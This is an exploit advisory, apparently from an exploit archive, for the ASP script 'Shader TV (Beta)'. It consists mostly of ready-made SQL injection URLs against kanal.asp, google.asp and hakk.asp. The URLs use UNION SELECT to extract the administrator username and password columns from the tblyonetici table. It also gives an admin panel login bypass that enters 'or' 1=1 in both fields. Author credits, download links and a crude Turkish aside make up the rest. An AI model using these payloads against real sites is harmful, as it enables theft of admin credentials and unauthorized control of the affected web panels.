Shader TV (Beta) Multiple Remote SQL İnjection Vulnerable Script : http://www.aspindir.com/indir.asp?ID=5441 Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html Coded : Asp Lnguae : Acces Discovered By U238 | < Ugurcan Engin > Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz : Web - Designer Solution Developer setuid.noexec0x1@hotmail.com http://noexec.blogspot.com 0x1 = [S** Says : Allah Belan&#177; Versin Ulan &#197;&#65533;iz0 !] 0x2 = [Ben Sadece İyi Bir İnsan Olmak İstemistim ] Exploit: Administrator Login to creative web panel is atack of to SQL injectin. http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici ---- http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,parola+from+tblyonetici&sayfa=1 http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,kullanici+from+tblyonetici&sayfa=1 ---- http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,parola+from+tblyonetici http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,kullanici+from+tblyonetici Administrator Panel : target/ShaderTV/yonet ------------------------------- Admin Panel Login Bypass : target/ShaderTV/yonet/default.asp username : 'or' 1=1 password : 'or' 1=1 This is Admin Panel See You ? ---------------------------------